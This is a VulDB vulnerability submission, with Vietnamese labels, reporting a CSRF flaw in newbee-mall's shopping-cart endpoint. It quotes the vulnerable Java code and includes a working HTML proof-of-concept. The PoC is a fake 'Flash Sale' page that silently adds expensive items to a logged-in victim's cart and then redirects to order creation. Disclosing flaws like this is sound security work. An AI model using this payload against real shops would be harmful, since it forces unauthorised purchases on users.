| tiêu đề | newbee-ltd newbee-mall v1.0 CSRF |
|---|
| Mô tả | # CSRF Vulnerability in Shopping Cart Item Addition
## Summary
A **CSRF vulnerability** exists in the shopping cart addition endpoint `/shop-cart` (POST). Attackers can add arbitrary items to users' shopping carts, which can be chained with the order creation CSRF to force unauthorized purchases.
## Vulnerability Details
### Configuration-Level Issue
**File**: `src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java`
```java
@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
public void addInterceptors(InterceptorRegistry registry) {
registry.addInterceptor(newBeeMallLoginInterceptor)
.addPathPatterns("/shop-cart/**");
// ❌ No CSRF token validation configured
}
}
```
### Endpoint-Level Code Analysis
**File**: `src/main/java/ltd/newbee/mall/controller/mall/ShoppingCartController.java` (Lines 63-76)
```java
@PostMapping("/shop-cart")
@ResponseBody
public Result saveNewBeeMallShoppingCartItem(@RequestBody NewBeeMallShoppingCartItem newBeeMallShoppingCartItem,
HttpSession httpSession) {
NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
newBeeMallShoppingCartItem.setUserId(user.getUserId());
// ❌ No CSRF token validation
// ⚠️ Accepts JSON payload from any origin
String saveResult = newBeeMallShoppingCartService.saveNewBeeMallCartItem(newBeeMallShoppingCartItem);
if (ServiceResultEnum.SUCCESS.getResult().equals(saveResult)) {
return ResultGenerator.genSuccessResult();
}
return ResultGenerator.genFailResult(saveResult);
}
```
**Security Issues**:
1. ❌ No CSRF token validation
2. ⚠️ Accepts JSON requests with `credentials: include`
3. ⚠️ Can be chained with order creation for full attack
## Proof of Concept (PoC)
```html
<!DOCTYPE html>
<html>
<head>
<title>Special Offer - Limited Time!</title>
</head>
<body>
<h1>???? Flash Sale! 90% OFF</h1>
<p>Adding special offers to your cart...</p>
<script>
// Add expensive items to victim's shopping cart
var itemsToAdd = [
{goodsId: 10047, goodsCount: 5}, // Expensive item 1
{goodsId: 10048, goodsCount: 10}, // Expensive item 2
{goodsId: 10049, goodsCount: 3} // Expensive item 3
];
itemsToAdd.forEach(function(item) {
fetch('http://localhost:28089/shop-cart', {
method: 'POST',
credentials: 'include',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(item)
})
.then(response => response.json())
.then(data => console.log('Added item:', item.goodsId));
});
// Step 2: Redirect to order creation (chain attack)
setTimeout(function() {
window.location.href = 'http://localhost:28089/saveOrder';
}, 2000);
</script>
</body>
</html>
```
## Impact
**Unauthorized shopping cart manipulation leading to forced purchases** - When combined with order creation CSRF, attackers can force users to buy unwanted expensive items.
---
**CVSS Score**: 7.6 (High)
|
|---|
| Nguồn | ⚠️ https://github.com/newbee-ltd/newbee-mall/issues/110 |
|---|
| Người dùng | flashzyc (UID 92850) |
|---|
| Đệ trình | 05/02/2026 11:54 (cách đây 4 các tháng) |
|---|
| Kiểm duyệt | 18/02/2026 07:56 (13 days later) |
|---|
| Trạng thái | Bản sao |
|---|
| Mục VulDB | 346456 [newbee-ltd newbee-mall đến a069069b07027613bf0e7f571736be86f431faee Multiple Endpoints Giả mạo yêu cầu liên trang] |
|---|
| điểm | 0 |
|---|